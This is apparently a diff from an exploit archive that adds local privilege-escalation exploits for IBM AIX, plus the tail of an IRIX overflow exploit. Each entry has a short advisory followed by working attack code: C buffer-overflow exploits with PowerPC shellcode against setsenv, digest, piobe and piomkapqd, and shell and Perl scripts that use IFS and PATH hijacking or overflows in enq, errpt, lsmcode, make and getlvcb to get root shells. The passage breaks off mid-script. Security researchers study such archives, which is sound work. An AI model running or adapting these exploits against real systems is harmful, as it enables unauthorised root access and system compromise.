0x2f7368ff, /* "/sh" */
};
char buf[NUM_ADDRESSES+BUF_LENGTH + EXTRA + 8];
void main(int argc, char **argv)
{
char *env[] = {NULL};
u_long targ_addr, stack, tmp;
u_long *long_p;
int i, code_length = strlen((char *)irix_shellcode)+1;
u_long (*get_sp)(void) = (u_long (*)(void))get_sp_code;
stack = get_sp();
if (stack & 0x80000000) {
printf("Recompile with the '-n32' option\n");
exit(1);
}
long_p =(u_long *) buf;
targ_addr = stack + OFFSET;
if (argc > 1)
targ_addr += atoi(argv[1]) * 4;
if (targ_addr + GP_OFFSET > 0x80000000) {
printf("Sorry - this exploit for Irix 6.x only\n");
exit(1);
}
tmp = (targ_addr + NUM_ADDRESSES + (BUF_LENGTH-code_length)/2) & ~3;
while ((tmp & 0xff000000) == 0 ||
(tmp & 0x00ff0000) == 0 ||
(tmp & 0x0000ff00) == 0 ||
(tmp & 0x000000ff) == 0)
tmp += 4;
for (i = 0; i < NUM_ADDRESSES/sizeof(u_long); i++)
*long_p++ = tmp;
for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
*long_p++ = IRIX_NOP;
for (i = 0; i < code_length/sizeof(u_long); i++)
*long_p++ = irix_shellcode[i];
tmp = (targ_addr + GP_OFFSET + NUM_ADDRESSES/2) & ~3;
for (i = 0; i < EXTRA / sizeof(u_long); i++)
*long_p++ = (tmp << 16) | (tmp >> 16);
*long_p = 0;
printf("stack = 0x%x, targ_addr = 0x%x\n", stack, targ_addr);
execle("/usr/lib/desktop/permissions", "permissions",
"-display", getenv("DISPLAY"), "/bin/ls", buf, 0, env);
perror("execl failed");
}

29
platforms/aix/local/19344.sh Executable file
View file

@ -0,0 +1,29 @@
source: http://www.securityfocus.com/bid/454/info
Under older versions of AIX By changing the IFS enviroment variable to / setuid root programs that use system() or popen() can be fooled into running user provided programs.
#!/bin/csh
# IFS hole in AIX3.2 rmail gives egid=mail. Apr. 1994
# Setup needed files.
mkdir /tmp/.rmail
cd /tmp/.rmail
cat << EOF > usr
cp sh mailsh
chmod 2777 mailsh
EOF
chmod 777 usr
ln -s /bin/sh .
# Set PATH, IFS, and run rmail.
setenv PATH .:$PATH
setenv IFS /
echo "cheezy mail hack" | rmail joeuser@nohost.com
unsetenv IFS
rm -f usr sh # minor cleanup.
echo "Attempting to run sgid shell."
./mailsh

6
platforms/aix/local/19345 Executable file
View file

@ -0,0 +1,6 @@
source: http://www.securityfocus.com/bid/455/info
There exists a vulnerability in the lquerypv command under AIX. By using the '-h' flaq, a user may read any file on the file system in hex format.
/usr/sbin/lquerypv -h /pathtofilename

7
platforms/aix/local/19354 Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/468/info
The sgihelp program, from SGI and included with IRIX 5.1 and 5.2, contains a vulnerability. sgihelp contains an option that allows a user to print to a command. Certain SGI utilities, including PrintStatus, printers, scanners, and a number of others, will call this program without changing their uid to the users, from roots. As such, arbitrary commands can be executed as root using the 'print to command' option of sgihelp.
Run PrintStatus
Press the 'help' button.
Select the 'print to command' option. This will allow you to execute anything as root.

10
platforms/aix/local/19418 Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/520/info
adb is the debugger that ships with IBM's AIX operating system. It is possible for a local user to cause a local denial of service through exploiting the version of adb shipped with AIX 4.2 through 4.3.1. The consequence of adb being exploited is the machine being halted by a malicious local user.
gcc -g -o a.out hello-world.c
$ adb a.out -
adb
.main,5:s
a.out: running

6
platforms/aix/local/20213.txt Executable file
View file

@ -0,0 +1,6 @@
source: http://www.securityfocus.com/bid/1660/info
A vulnerability exists in versions 4.x. x of AIX, from IBM. Any local user can utilize the -Z command to netstat, without needing to be root. This will cause interface statistics to be reset. This could potentially interfere with programs that track statistical information.
$ netstat -in --> shows stats
$ netstat -Zi --> clears them without checking the uid

6
platforms/aix/local/20290.txt Executable file
View file

@ -0,0 +1,6 @@
source: http://www.securityfocus.com/bid/1800/info
A vulnerability exists in AIX 3.* versions of bugfiler, a utility which automates the process of reporting an filing system bugs. Bugfiler, installed setuid root, creates files in a directory specified by the user invoking the program (example: $/lib/bugfiler -b <user> directory>). It may be possible for an attacker to create files in arbitrary directories that are owned by attacker-specified users. This may result in an elevation of privileges for the attacker. Further technical details about this vulnerability are not known.
$whoami eviluser
$/lib/bugfiler -b <user> <directory> creates funny files under the <user>-owned <directory> and that may be used by crackers to increase privileges. See the manpage of bugfiler for more information. (bugfiler does not work for some <user>s)

79
platforms/aix/local/20452.c Executable file
View file

@ -0,0 +1,79 @@
source: http://www.securityfocus.com/bid/2032/info
AIX is a version of the UNIX Operating System distributed by IBM. A problem exists that could allow a user elevated priviledges.
The problem occurs in the setsenv binary. It has been reported that a buffer overflow exists in this binary which could allow a user to overwrite variables on the stack, including the return address. This makes it possible for a malicious user to execute arbitrary code, and potentially attain a UID of 0.
/*## copyright LAST STAGE OF DELIRIUM sep 2000 poland *://lsd-pl.net/ #*/
/*## /usr/bin/setsenv #*/
/* note: to avoid potential system hang-up please, first obtain the exact */
/* AIX OS level with the use of the uname -a or oslevel commands */
#define ADRNUM 200
#define NOPNUM 16000
char setreuidcode[]=
"\x7e\x94\xa2\x79" /* xor. r20,r20,r20 */
"\x40\x82\xff\xfd" /* bnel <setreuidcode> */
"\x7e\xa8\x02\xa6" /* mflr r21 */
"\x3a\xb5\x01\x40" /* cal r21,0x140(r21) */
"\x88\x55\xfe\xe0" /* lbz r2,-288(r21) */
"\x7e\x83\xa3\x78" /* mr r3,r20 */
"\x3a\xd5\xfe\xe4" /* cal r22,-284(r21) */
"\x7e\xc8\x03\xa6" /* mtlr r22 */
"\x4c\xc6\x33\x42" /* crorc cr6,cr6,cr6 */
"\x44\xff\xff\x02" /* svca */
"\xff\xff\xff\xff"
"\x38\x75\xff\x04" /* cal r3,-252(r21) */
"\x38\x95\xff\x0c" /* cal r4,-244(r21) */
"\x7e\x85\xa3\x78" /* mr r5,r20 */
"\x90\x75\xff\x0c" /* st r3,-244(r21) */
"\x92\x95\xff\x10" /* st r20,-240(r21) */
"\x88\x55\xfe\xe1" /* lbz r2,-287(r21) */
"\x9a\x95\xff\x0b" /* stb r20,-245(r21) */
"\x4b\xff\xff\xd8" /* bl <setreuidcode+32> */
"/bin/sh"
;
char nop[]="\x7f\xff\xfb\x78";
main(int argc,char **argv,char **e){
char buffer[20000],adr[4],*b,*envp[2];
int i;
printf("copyright LAST STAGE OF DELIRIUM sep 2000 poland //lsd-pl.net/\n");
printf("/usr/bin/setsenv for aix 4.1 4.2 4.3 4.3.x PowerPC/POWER\n\n");
if(argc<2){
printf("usage: %s 41|42|43|433\n",argv[0]);exit(-1);
}
switch(atoi(argv[1])){
case 41: memcpy(&setreuidcode[40],"\x68\x03",2); break;
case 42: memcpy(&setreuidcode[40],"\x71\x02",2); break;
case 43: memcpy(&setreuidcode[40],"\x82\x04",2); break;
case 433: memcpy(&setreuidcode[40],"\x92\x03",2); break;
default: exit(-1);
}
i=0; while(*e++) i+=strlen(*e)+1;
*((unsigned long*)adr)=(unsigned long)e+(i&~3)-8000;
envp[0]=&buffer[1000];
envp[1]=0;
b=buffer;
strcpy(b,"lsd=");b+=4;
for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
*b=0;
b=&buffer[1000];
sprintf(b,"xxx= ");b+=7;
for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
for(i=0;i<strlen(setreuidcode);i++) *b++=setreuidcode[i];
*b=0;
execle("/usr/bin/setsenv","lsd",buffer,0,envp);
}

87
platforms/aix/local/20453.c Executable file
View file

@ -0,0 +1,87 @@
source: http://www.securityfocus.com/bid/2033/info
AIX is a version of the UNIX Operating System distributed by IBM. A vulnerability exists in the operating system which could allow a user an elevation in priviledge.
The problem occurs in the digest binary. It is reported that it is possible to overflow a buffer in the program and overwrite a pointer to the stack, which in turn can result in an overflow in a library referenced by the binary. The secondary overflow in the library makes it possible to overwrite other stack variables, including the return address.
A malicious user could use this vulnerability to gain an elevation in priviledges, and potentially UID 0.
/*## copyright LAST STAGE OF DELIRIUM dec 2000 poland *://lsd-pl.net/ #*/
/*## /usr/lib/lpd/digest #*/
/* note: to avoid potential system hang-up please, first obtain the exact */
/* AIX OS level with the use of the uname -a or oslevel commands */
/* printq group to root user's privilages escalation attack */
/* use aix_piomkapqd or aix_piobe codes first in order to gain egid=printq */
#define PCHNUM 2200
#define ADRNUM 8000
#define NOPNUM 8000
#define ALLIGN 2
char setreuidcode[]=
"\x7e\x94\xa2\x79" /* xor. r20,r20,r20 */
"\x40\x82\xff\xfd" /* bnel <setreuidcode> */
"\x7e\xa8\x02\xa6" /* mflr r21 */
"\x3a\xb5\x01\x40" /* cal r21,0x140(r21) */
"\x88\x55\xfe\xe0" /* lbz r2,-288(r21) */
"\x7e\x83\xa3\x78" /* mr r3,r20 */
"\x3a\xd5\xfe\xe4" /* cal r22,-284(r21) */
"\x7e\xc8\x03\xa6" /* mtlr r22 */
"\x4c\xc6\x33\x42" /* crorc cr6,cr6,cr6 */
"\x44\xff\xff\x02" /* svca */
"\xff\xff\xff\xff"
"\x38\x75\xff\x04" /* cal r3,-252(r21) */
"\x38\x95\xff\x0c" /* cal r4,-244(r21) */
"\x7e\x85\xa3\x78" /* mr r5,r20 */
"\x90\x75\xff\x0c" /* st r3,-244(r21) */
"\x92\x95\xff\x10" /* st r20,-240(r21) */
"\x88\x55\xfe\xe1" /* lbz r2,-287(r21) */
"\x9a\x95\xff\x0b" /* stb r20,-245(r21) */
"\x4b\xff\xff\xd8" /* bl <setreuidcode+32> */
"/bin/sh"
;
char nop[]="\x7f\xff\xfb\x78";
main(int argc,char **argv,char **e){
char buffer[20000],adr[4],pch[4],*b,*envp[2];
int i;
printf("copyright LAST STAGE OF DELIRIUM dec 2000 poland //lsd-pl.net/\n");
printf("/usr/lib/lpd/digest for aix 4.1 4.2 4.3 PowerPC/POWER\n\n");
if(argc<2){
printf("usage: %s 41|42|43\n",argv[0]);exit(-1);
}
switch(atoi(argv[1])){
case 41: memcpy(&setreuidcode[40],"\x68\x03",2); break;
case 42: memcpy(&setreuidcode[40],"\x71\x02",2); break;
case 43: memcpy(&setreuidcode[40],"\x82\x04",2); break;
default: exit(-1);
}
i=0; while(*e++) i+=strlen(*e)+1;
*((unsigned long*)adr)=(unsigned long)e+(i&~3)-8000-2300;
*((unsigned long*)pch)=(unsigned long)e+(i&~3)-2300;
envp[0]=&buffer[3000];
envp[1]=0;
b=buffer;
for(i=0;i<ALLIGN;i++) *b++=' ';
for(i=0;i<PCHNUM;i++) *b++=pch[i%4];
*b=0;
b=&buffer[3000];
sprintf(b,"xxx= ");b+=5;
for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
for(i=0;i<strlen(setreuidcode);i++) *b++=setreuidcode[i];
for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
*b=0;
execle("/usr/lib/lpd/digest","lsd",buffer,"lsd",0,envp);
}

58
platforms/aix/local/20454.sh Executable file
View file

@ -0,0 +1,58 @@
source: http://www.securityfocus.com/bid/2034/info
AIX is a variant of the UNIX Operating System, distributed by IBM. A problem exists that may allow elevation of user priviledges.
The problem occurs in the enq program. It is reported that an overflow exists in the command line argument parsing, which could lead to the overwriting of variables on the stack. This creates the potential for a malicious user to execute arbitrary code, and possibly gain administrative access.
#!/bin/sh
# FileName: ex_enq_aix4x.sh
# Exploit "enq & qstatus" of Aix4.x to get egid=9 shell.
# Usage : chmod ex_enq_aix4x.sh ; ./ex_enq_aix4x.sh
# Tested : on Aix4.3.3
# Author : watercloud@xfocus.org
# Site : www.xfocus.org www.xfocus.net
# Date : 2003-4-24
# Announce: use as your owner risk!
PERL=/usr/bin/perl
TMP=/tmp/.env.tmp
SHPL=/tmp/.sh.pl
cat >$SHPL<<EOF
#!/usr/bin/perl
\$BUFF="";
\$BUFF.="\x7c\xa5\x2a\x79"x500;
\$OSLEVEL=\`/usr/bin/oslevel\`;
\$ID="\x04";
if( \$OSLEVEL=~/4\.1/ ) {
\$ID="\x03";
} elsif(\$OSLEVEL=~/4\.3\.3/) {
\$ID="\x03";
} elsif( \$OSLEVEL=~/4\.2/ ) {
\$ID="\x02";
}
\$BUFF.="\x7c\xa5\x2a\x79\x40\x82\xff\xfd\x7f\xe8\x02\xa6";
\$BUFF.="\x3b\xff\x01\x20\x38\x7f\xff\x08\x38\x9f\xff\x10";
\$BUFF.="\x90\x7f\xff\x10\x90\xbf\xff\x14\x88\x5f\xff\x0f";
\$BUFF.="\x98\xbf\xff\x0f\x4c\xc6\x33\x42\x44\xff\xff\x02";
\$BUFF.="/bin/sh";
\$BUFF.=\$ID;
print \$BUFF;
EOF
env | awk -F = '{print "unset "$1;}'|grep -v LOGNAME > $TMP
. $TMP
/bin/rm -f $TMP
CC=A`$PERL $SHPL` ; export CC
/bin/rm -f $SHPL
/usr/bin/enq -w"`perl -e 'print "\x2f\xf2\x2b\x10"x600'`"
#EOF

79
platforms/aix/local/20455.c Executable file
View file

@ -0,0 +1,79 @@
source: http://www.securityfocus.com/bid/2037/info
AIX is a variant of the UNIX Operating System, distributed by IBM. A problem exists which can allow a local user elevated priviledges.
The problem exists in the piobe program. Due to the insuffient handling of the PIOSTATUSFILE, PIOTITLE, and PIOVARDIR environment variables, it's possible to overwrite stack variables. This makes it possible for a malicious user to pass specially formatted strings to the program via environment variables, and potentially gain administrative access.
/*## copyright LAST STAGE OF DELIRIUM dec 2000 poland *://lsd-pl.net/ #*/
/*## /usr/lib/lpd/piobe #*/
/* note: to avoid potential system hang-up please, first obtain the exact */
/* AIX OS level with the use of the uname -a or oslevel commands */
/* this code gives privilages of a printq group and command shell (without */
/* a prompt). from that point euid=root can be gained with the use of our */
/* aix_piodmgrsu or aix_digest codes */
#define ADRNUM 3000
#define NOPNUM 16000
char shellcode[]=
"\x7c\xa5\x2a\x79" /* xor. r5,r5,r5 */
"\x40\x82\xff\xfd" /* bnel <shellcode> */
"\x7f\xe8\x02\xa6" /* mflr r31 */
"\x3b\xff\x01\x20" /* cal r31,0x120(r31) */
"\x38\x7f\xff\x08" /* cal r3,-248(r31) */
"\x38\x9f\xff\x10" /* cal r4,-240(r31) */
"\x90\x7f\xff\x10" /* st r3,-240(r31) */
"\x90\xbf\xff\x14" /* st r5,-236(r31) */
"\x88\x5f\xff\x0f" /* lbz r2,-241(r31) */
"\x98\xbf\xff\x0f" /* stb r5,-241(r31) */
"\x4c\xc6\x33\x42" /* crorc cr6,cr6,cr6 */
"\x44\xff\xff\x02" /* svca */
"/bin/sh\xff"
;
char nop[]="\x7f\xff\xfb\x78";
main(int argc,char **argv,char **e){
char buffer[20000],adr[4],*b,*envp[4];
int i,align;
printf("copyright LAST STAGE OF DELIRIUM dec 2000 poland //lsd-pl.net/\n");
printf("/usr/lib/lpd/piobe for aix 4.1 4.2 4.3 4.3.x PowerPC/POWER\n\n");
if(argc<2){
printf("usage: %s 41|42|43|433\n",argv[0]);exit(-1);
}
switch(atoi(argv[1])){
case 41: shellcode[55]=0x03;align=2; break;
case 42: shellcode[55]=0x02;align=0; break;
case 43: shellcode[55]=0x04;align=0; break;
case 433: shellcode[55]=0x03;align=0; break;
default: exit(-1);
}
i=0; while(*e++) i+=strlen(*e)+1;
*((unsigned long*)adr)=(unsigned long)e+(i&~3)-8000;
envp[0]="PIOSTATUSFILE=lsd";
envp[1]=buffer;
envp[2]=&buffer[3500];
envp[3]=0;
b=buffer;
strcpy(b,"PIOVARDIR=");b+=10;
for(i=0;i<align;i++) *b++=' ';
for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
*b=0;
b=&buffer[3500];
sprintf(b,"xxx=");b+=4;
for(i=0;i<3-align;i++) *b++=' ';
for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
execle("/usr/lib/lpd/piobe","lsd",0,envp);
}

59
platforms/aix/local/20965.sh Executable file
View file

@ -0,0 +1,59 @@
source: http://www.securityfocus.com/bid/2916/info
AIX ships with a diagnostic reporting utility called 'diagrpt'. This utility is installed setuid root by default.
When 'diagrpt' executes, it relies on an environment variable to locate another utility which it executes. This utility is executed by 'diagrpt' as root.
An attacker can gain root privileges by having 'diagrpt' execute a malicious program of the same name in a directory under their control.
#!/bin/sh
# FileName: x_diagrpt.sh
# Exploit diagrpt of Aix4.x & 5L to get a uid=0 shell.
# Tested : on Aix4.3.3 & Aix5.1.
# Author : watercloud@xfocus.org
# Site : www.xfocus.org www.xfocus.net
# Date : 2003-5-23
# Announce: use as your owner risk!
#
# Note :
# It does not work on all versions of tsm command.
# Use this command to test if your version can exploit or not :
# bash$ strings /usr/lpp/diagnostics/bin/diagrpt |grep cat
# diagrpt.cat
# cat %s <--- here ! have the bug !!! can exploit!
#
O_DIR=`/bin/pwd`
cd /tmp ; mkdir .ex$$ ; cd .ex$$
PATH=/tmp/.ex$$:$PATH ; export PATH
/bin/cat >cat<<EOF
#!/bin/ksh -p
cp /bin/ksh ./kfsh
chown root ./kfsh
chmod 777 ./kfsh
chmod u+s ./kfsh
EOF
chmod a+x cat
DIAGDATADIR=/tmp/.ex$$ ; export DIAGDATADIR
touch /tmp/.ex$$/diagrpt1.dat
/usr/lpp/diagnostics/bin/diagrpt -o 010101
stty echo
stty intr '^C' erase '^H' eof '^D' eol '^@'
if [ -e ./kfsh ] ;then
echo ""
echo "===================="
pwd
ls -l ./kfsh
echo "Exploit ok ! Use this command to get a uid=0 shell :"
echo '/usr/bin/syscall setreuid 0 0 \; execve "/bin/sh" '
./kfsh
else
echo ""
echo "Exploit false !!!!"
fi
cd /tmp ; /bin/rm -Rf /tmp/.ex$$ ;cd $O_DIR
#EOF

86
platforms/aix/local/21094.c Executable file
View file

@ -0,0 +1,86 @@
source: http://www.securityfocus.com/bid/3238/info
The 'piomkapqd' utility is a component of the AIX printing subsystem. By default, it is installed setgid and owned by the 'printk' group.
'piomkapqd' contains a locally exploitable stack overrun condition in it's handling of command line parameters.
Local users may be able to gain group 'printk' privileges if this vulnerability is exploited. It may be possible to elevate to root from this point by exploiting vulnerabilities in other components of the printing subsystem.
/*## copyright LAST STAGE OF DELIRIUM sep 2000 poland *://lsd-pl.net/ #*/
/*## /usr/lib/lpd/pio/etc/piomkapqd #*/
/* note: to avoid potential system hang-up please, first obtain the exact */
/* AIX OS level with the use of the uname -a or oslevel commands */
/* this code gives privilages of a printq group. from that point euid=root */
/* can be gained with the use of our aix_piodmgrsu or aix_digest codes */
#define ADRNUM 2000
#define NOPNUM 16000
#define PRINTQ_GID 9
char setregidcode[]=
"\x7e\x94\xa2\x79" /* xor. r20,r20,r20 */
"\x40\x82\xff\xfd" /* bnel (setregidcode) */
"\x7e\xa8\x02\xa6" /* mflr r21 */
"\x3a\xb5\x01\x40" /* cal r21,0x140(r21) */
"\x88\x55\xfe\xe4" /* lbz r2,-284(r21) */
"\x88\x75\xfe\xe7" /* lbz r3,-281(r21) */
"\x88\x95\xfe\xe6" /* lbz r4,-282(r21) */
"\x3a\xd5\xfe\xe8" /* cal r22,-280(r21) */
"\x7e\xc8\x03\xa6" /* mtlr r22 */
"\x4c\xc6\x33\x42" /* crorc cr6,cr6,cr6 */
"\x44\xff\xff\x02" /* svca */
"\xff\xff\xff\x01"
"\x38\x75\xff\x08" /* cal r3,-248(r21) */
"\x38\x95\xff\x10" /* cal r4,-240(r21) */
"\x7e\x85\xa3\x78" /* mr r5,r20 */
"\x90\x75\xff\x10" /* st r3,-240(r21) */
"\x92\x95\xff\x14" /* st r20,-236(r21) */
"\x88\x55\xfe\xe5" /* lbz r2,-283(r21) */
"\x9a\x95\xff\x0f" /* stb r20,-241(r21) */
"\x4b\xff\xff\xd8" /* bl (setregidcode+32) */
"/bin/sh"
;
char nop[]="\x7f\xff\xfb\x78";
main(int argc,char **argv,char **e){
char buffer[20000],adr[4],*b,*envp[2];
int i;
printf("copyright LAST STAGE OF DELIRIUM sep 2000 poland //lsd-pl.net/\n");
printf("/usr/lib/lpd/pio/etc/piomkapqd for aix 4.2 4.3 PowerPC/POWER\n\n");
if(argc<2){
printf("usage: %s 42|43|433\n",argv[0]);exit(-1);
}
switch(atoi(argv[1])){
case 42: memcpy(&setregidcode[44],"\xd2\x02",2); break;
case 43: memcpy(&setregidcode[44],"\xe7\x04",2); break;
case 433: memcpy(&setregidcode[44],"\x82\x03",2); break;
default: exit(-1);
}
setregidcode[46]=PRINTQ_GID;
i=0; while(*e++) i+=strlen(*e)+1;
*((unsigned long*)adr)=(unsigned long)e+(i&~3)-8000;
envp[0]=&buffer[3000];
envp[1]=0;
b=buffer;
for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
*b=0;
b=&buffer[3000];
sprintf(b,"xxx=");b+=4;
for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
for(i=0;i<strlen(setregidcode);i++) *b++=setregidcode[i];
*b=0;
execle("/usr/lib/lpd/pio/etc/piomkapqd","lsd","-p",buffer,0,envp);
}

29
platforms/aix/local/21904.pl Executable file
View file

@ -0,0 +1,29 @@
source: http://www.securityfocus.com/bid/5885/info
The IBM AIX errpt command is prone to a locally exploitable buffer overflow condition. It is possible to exploit this condition to execute arbitrary attacker-supplied instructions with root privileges.
#!/usr/bin/perl
# FileName: x_errpt_aix5.pl
# Exploit command errpt for Aix5L to get a root shell.
# Tested : on Aix5.1
# Author : watercloud@xfocus.org
# Site : www.xfocus.org www.xfocus.net
# Date : 2003-4-16
# Announce: use as your owner risk!
$BUFF="A". "\x7c\xa5\x2a\x79"x500;
#shellcode from lsd-pl and modified by watercloud 2003-4 for Aix5L
$BUFF.="\x7e\x94\xa2\x79\x40\x82\xff\xfd\x7e\xa8\x02\xa6\x3a\xb5\x01\x40";
$BUFF.="\x88\x55\xfe\xe0\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6";
$BUFF.="\x4c\xc6\x33\x42\x44\xff\xff\x02\xb6\x05\xff\xff\x7e\x94\xa2\x79";
$BUFF.="\x7e\x84\xa3\x78\x40\x82\xff\xfd\x7e\xa8\x02\xa6\x3a\xb5\x01\x40";
$BUFF.="\x88\x55\xfe\xe0\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6";
$BUFF.="\x4c\xc6\x33\x42\x44\xff\xff\x02\xb7\x05\xff\xff\x38\x75\xff\x04";
$BUFF.="\x38\x95\xff\x0c\x7e\x85\xa3\x78\x90\x75\xff\x0c\x92\x95\xff\x10";
$BUFF.="\x88\x55\xfe\xe1\x9a\x95\xff\x0b\x4b\xff\xff\xd8/bin/sh";
%ENV=(); $ENV{CC}=$BUFF;
exec "/usr/bin/errpt","-T","A"."\x2f\xf2\x2a\x40"x1320;
#EOF

49
platforms/aix/local/22756.pl Executable file
View file

@ -0,0 +1,49 @@
source: http://www.securityfocus.com/bid/7871/info
Insufficient bounds checking in the lsmcode utility will allow locally based attackers to cause memory to be corrupted with attacker-supplied data. As a result, it is possible to exploit this condition to execute arbitrary attacker-supplied instructions with elevated privileges.
#!/usr/bin/perl
# FileName: x_lsmcode_aix4x.pl
# Exploit lsmcode of Aix4.3.3 to get a uid=0 shell.
# Tested : on Aix4.3.3.Mybe can work on other versions.
# Author : watercloud@xfocus.org
# Site : www.xfocus.org www.xfocus.net
# Date : 2003-6-1
# Announce: use as your owner risk!
$CMD="/usr/sbin/lsmcode";
$_=`/usr/bin/oslevel`;
$XID="\x03";
$UID="\x97";
print "\n\nExploit $CMD for Aix 4.3.3 to get uid=0 shell.\n";
print "From: [ www.xfocus.org 2003-6-1 ].\n\n";
$NOP="\x7c\xa5\x2a\x79"x800;
%ENV=();
$ENV{CCC}="A" .$NOP.&getshell($XID,$UID);
$ENV{DIAGNOSTICS}="\x2f\xf2\x2a\x2f"x300;
$ret = system $CMD ,"-d","a";
for($i=0;$i<4 && $ret;$i++){
for($j=0;$j<4 && $ret;$j++) {
$ENV{CCC}="A"x $i .$NOP.&getshell($XID,$UID);
$ENV{DIAGNOSTICS}="A"x $j ."\x2f\xf2\x2a\x2f"x300;
$ret = system $CMD ,"-d","a";
}
}
#sub
sub getshell($XID,$GID) {
my $SHELL,($XID,$GID)=@_;
$SHELL="\x7e\x94\xa2\x79\x7e\x84\xa3\x78\x40\x82\xff\xfd";
$SHELL.="\x7e\xa8\x02\xa6\x3a\xb5\x01\x40\x88\x55\xfe\xe0";
$SHELL.="\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6";
$SHELL.="\x4c\xc6\x33\x42\x44\xff\xff\x02$GID$XID\xff\xff";
$SHELL.="\x38\x75\xff\x04\x38\x95\xff\x0c\x7e\x85\xa3\x78";
$SHELL.="\x90\x75\xff\x0c\x92\x95\xff\x10\x88\x55\xfe\xe1";
$SHELL.="\x9a\x95\xff\x0b\x4b\xff\xff\xd8/bin/sh\xff";
return $SHELL;
}
#EOF

57
platforms/aix/local/23838.pl Executable file
View file

@ -0,0 +1,57 @@
source: http://www.securityfocus.com/bid/9903/info
GNU make for IBM AIX has been reported to be prone to a buffer overflow vulnerability, the issue is reported to exist due to a lack of sufficient boundary checks performed when reading the path to the CC compiler.
Because the GNU make utility is reported to run with setGID root privileges, a local attacker may potentially exploit this condition to gain access to the root group.
This issue is reported to exist on AIX 4.3.3 platforms.
#!/usr/bin/perl
# FileName: x_make_aix433_limited.pl
# Exploit /usr/local/bin/make of Aix4.3.3 to get a gid=0 shell.
# Tested on low version of Aix4.3.3.
# Author : watercloud@xfocus.org
# Site : www.xfocus.org (EN) / www.xfocus.net (CN)
# Date : 2003-5-30
# Announce: use as your owner risk!
$CMD="/usr/local/bin/make";
$_=`/usr/bin/oslevel`;
$XID="\x03";
@GID_LIST=(248,247);
print "\n\nExploit $CMD for Aix 4.3.3 to get gid=0 shell.\n";
print "From: [ www.xfocus.org 2003-5-30 ].\n\n";
print "Note :use this command to get gid=0 after egid=0 :\n";
print "/usr/bin/syscall setregid 0 0 \\; execve '/bin/sh'\n";
$str="k:k.c\n\t\${CC} k.c\n\t";
open mfd,">Makefile" or die "open file Makefile for write error!\n";
open kfd,">k.c" or die "open file .k.c for write error!\n";
print mfd $str, print kfd $str;
close mfd, close kfd;
$NOP="\x7c\xa5\x2a\x79"x800;
%ENV=();
foreach $GID ( @GID_LIST) {
$ENV{CCC}=$NOP.&getshell($XID,chr($GID));
system $CMD ,"CC="."\x2f\xf2\x2b\x40"x300;
}
unlink "Makefile","k.c";
#sub
sub getshell($XID,$GID) {
my $SHELL,($XID,$GID)=@_;
$SHELL="\x7e\x94\xa2\x79\x7e\x84\xa3\x78\x40\x82\xff\xfd";
$SHELL.="\x7e\xa8\x02\xa6\x3a\xb5\x01\x40\x88\x55\xfe\xe0";
$SHELL.="\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6";
$SHELL.="\x4c\xc6\x33\x42\x44\xff\xff\x02$GID$XID\xff\xff";
$SHELL.="\x38\x75\xff\x04\x38\x95\xff\x0c\x7e\x85\xa3\x78";
$SHELL.="\x90\x75\xff\x0c\x92\x95\xff\x10\x88\x55\xfe\xe1";
$SHELL.="\x9a\x95\xff\x0b\x4b\xff\xff\xd8/bin/sh\xff";
return $SHELL;
}
#EOF

56
platforms/aix/local/23840.pl Executable file
View file

@ -0,0 +1,56 @@
source: http://www.securityfocus.com/bid/9905/info
getlvcb has been reported to be prone to a buffer overflow vulnerability.
When an argument is passed to the getlvcb utility, the string is copied into a reserved buffer in memory. Data that exceeds the size of the reserved buffer will overflow its bounds and will trample any saved data that is adjacent to the affected buffer. Ultimately this may lead to the execution of arbitrary instructions in the context of the root user.
An attacker will require system group privileges prior to the execution of the getlvcb utility, the attacker may exploit the issue described in BID 9903 in order to gain the necessary privileges required to exploit this vulnerability.
#!/usr/bin/perl
# FileName: x_getlvcb_aix433_limited.pl
# Exploit getlvcb of Aix4.3.3 to get a uid=0 shell from a gid=0.
# Tested : on Aix4.3.3.
# Author : watercloud@xfocus.org
# Site : www.xfocus.org www.xfocus.net
# Date : 2003-5-30
# Announce: use as your owner risk!
$CMD="/usr/sbin/getlvcb";
$_=`/usr/bin/oslevel`;
$XID="\x03";
$UID="\x97";
print "\n\nExploit $CMD for Aix 4.3.3 to get uid=0 shell.\n";
print "From: [ www.xfocus.org 2003-5-30 ].\n\n";
print "Note :\n";
print "You must get gid=0 befor use this exploit,for example ";
print "my another program x_make_433_limited.pl :)\n";
print "If you get a shell euid=0 then run this command: ";
print "/usr/bin/syscall setreuid 0 0 \\; execve '/bin/sh'\n";
$NOP="\x7c\xa5\x2a\x79"x800;
%ENV=();
$ENV{CCC}="AA".$NOP.&getshell($XID,$UID);
$ret=system $CMD ,"AAA"."\x2f\xf2\x2b\x40"x300;
for($i=0;$i<4 && $ret;$i++){
for($j=0;$j<4 && $ret;$j++) {
$ENV{CCC}="A"x $i .$NOP.&getshell($XID,$UID);
system $CMD ,"A"x $j ."\x2f\xf2\x2b\x40"x300;
}
}
#sub
sub getshell($XID,$GID) {
my $SHELL,($XID,$GID)=@_;
$SHELL="\x7e\x94\xa2\x79\x7e\x84\xa3\x78\x40\x82\xff\xfd";
$SHELL.="\x7e\xa8\x02\xa6\x3a\xb5\x01\x40\x88\x55\xfe\xe0";
$SHELL.="\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6";
$SHELL.="\x4c\xc6\x33\x42\x44\xff\xff\x02$GID$XID\xff\xff";
$SHELL.="\x38\x75\xff\x04\x38\x95\xff\x0c\x7e\x85\xa3\x78";
$SHELL.="\x90\x75\xff\x0c\x92\x95\xff\x10\x88\x55\xfe\xe1";
